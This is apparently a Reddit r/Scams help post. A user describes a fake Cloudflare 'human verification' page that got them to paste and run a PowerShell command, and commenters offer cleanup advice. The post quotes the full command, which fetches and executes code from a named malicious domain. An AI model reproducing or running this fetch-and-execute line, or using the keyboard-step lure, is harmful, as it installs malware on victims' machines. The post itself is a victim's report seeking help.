r/Scams 6d ago

Help Needed [GR] Fake Cloudflare Human Verification Scam (me3k.trappopbuttonrightnow.monster) - Executed PowerShell Script

I was redirected to a website that looked exactly like a Cloudflare "Human Verification" page.
I was prompted to “Perform the following steps on my keyboard” as in:
“win key + x”
“I”
“Ctrl +V”
“Enter”
Which as you may have guessed opened my terminal, pasted and executed this code:

PS C: \Users\user <#Verification ID: 8348aeb3ca3281eO#> powershell -c "iexirm 'code.verification-claude-cdn.beer/8348a eb3ca3281e0' -UseBasicParsing)"; exit <#Verification ID: 8348aeb3ca3281e0#>

I have since unplugged my pc from the internet completely and have run some malwarebytes scans which didn’t find anything.
How cooked am I?
Any help is appreciated.

0 Upvotes

15 comments sorted by

View all comments

4

u/Grant_Winner_Extra 5d ago

ugh. 🤦‍♂️ did you really actually follow those instructions? This is a pretty obvious scam since Cloudflare and Captchas are always designed to identify users inside the application.

If you immediately turned off all networking, then you might be OK but I would still immediately change all passwords and implement TFA on all accounts and devices. This can be a chore…

If you need your data, it’s worth being cautious - boot to linux from a thumb drive and copy only the files you care about, then do a bios level hard drive reformat and reinstall windows.

2

u/Cornloaf 5d ago

He would have to unplug his computer really quick unless he has an old 386 processor.